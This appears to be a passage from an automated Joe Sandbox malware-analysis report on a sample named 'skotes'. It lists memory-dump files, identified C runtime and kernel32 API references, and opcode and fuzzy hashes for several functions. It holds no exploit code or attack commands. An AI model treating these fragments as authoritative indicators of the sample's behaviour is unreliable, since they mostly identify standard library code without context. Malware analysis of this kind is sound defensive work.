                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                          • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                          • API String ID: 348560076-465693683
                                                          • Opcode ID: 97c96e4ef1dc50e1a6137e38a25c66bb6d7a2730db3093795a568ba5c45ee67b
                                                          • Instruction ID: c854c2a16dea8dfb5866081a7596c9c1707f245d999e9518e51ff8eb02889cb6
                                                          • Opcode Fuzzy Hash: 97c96e4ef1dc50e1a6137e38a25c66bb6d7a2730db3093795a568ba5c45ee67b
                                                          • Instruction Fuzzy Hash: 7D01F56566130A2E9710B7795C8ABBB36ECEE02B04B250476F901E3183FDA4D808A665
                                                          APIs
                                                          • StructuredWorkStealingQueue.LIBCMT ref: 00C120B7
                                                            • Part of subcall function 00C0CAF3: Mailbox.LIBCMT ref: 00C0CB2D
                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C120C8
                                                          • StructuredWorkStealingQueue.LIBCMT ref: 00C120FE
                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C1210F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                          • String ID: e
                                                          • API String ID: 1411586358-4024072794
                                                          • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                          • Instruction ID: 7175feb801981eb932589665e6b9b3aab2a331e41cb75a4a045d53dc4edc9db1
                                                          • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                          • Instruction Fuzzy Hash: E011E739200104ABCB05DE69C8816EE73A4EF07324B34C159FD068F142DB71DD92FBA0
                                                          APIs
                                                          Strings
                                                          • kernel32.dll, xrefs: 00BFD04C
                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BFD03B
                                                          • WakeAllConditionVariable, xrefs: 00BFD069
                                                          • SleepConditionVariableCS, xrefs: 00BFD05D
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___scrt_fastfail
                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                          • API String ID: 2964418898-3242537097
                                                          • Opcode ID: 2dd09723fc2284aa7b0afa99ee69cdd14e10e68f1ce1b45c5b84c4f6c5c907c5
                                                          • Instruction ID: 01b600eb13887b61148cf3a8832cd57e219f280ed981474c6bb42c92f15a9a8c
                                                          • Opcode Fuzzy Hash: 2dd09723fc2284aa7b0afa99ee69cdd14e10e68f1ce1b45c5b84c4f6c5c907c5
                                                          • Instruction Fuzzy Hash: 1701AD61BF2B196AAE313B715C1DF6F22CEEF83B50F091170BD00E3280DEA0C8058561
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16
                                                          • String ID:
                                                          • API String ID: 3509577899-0
                                                          • Opcode ID: dd7b0f37d090432abda10f34238036d442b230c67e220614ad975a2025b4e722
                                                          • Instruction ID: d18019e8be1b72741bdbbae89efe9039686aabb27a821676d7ded2342c1c4bcf
                                                          • Opcode Fuzzy Hash: dd7b0f37d090432abda10f34238036d442b230c67e220614ad975a2025b4e722
                                                          • Instruction Fuzzy Hash: 26511572600226AFEB299F64EC41FFB3BA9DF85750F150229FD14E7540EB70DD50AAA0
                                                          APIs
                                                          • Concurrency::location::_Assign.LIBCMT ref: 00C0E91E
                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00C0E926
                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00C0E950
                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00C0E959
                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00C0E9DC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                          • String ID:
                                                          • API String ID: 512098550-0
                                                          • Opcode ID: a135723f914c6c3e4a5da6369805fa2ebcee07f9e01bcbbc055ffc56a72b3a66
                                                          • Instruction ID: 989e857585caf1f770a8ece45837d25a4807fbc5dfe6efb613f773d8371697d2
                                                          • Opcode Fuzzy Hash: a135723f914c6c3e4a5da6369805fa2ebcee07f9e01bcbbc055ffc56a72b3a66
                                                          • Instruction Fuzzy Hash: 51414E35A00619EFCB09EF64C554AADBBB6FF48310F148159E916A73D0CB74AE01DF81
                                                          APIs
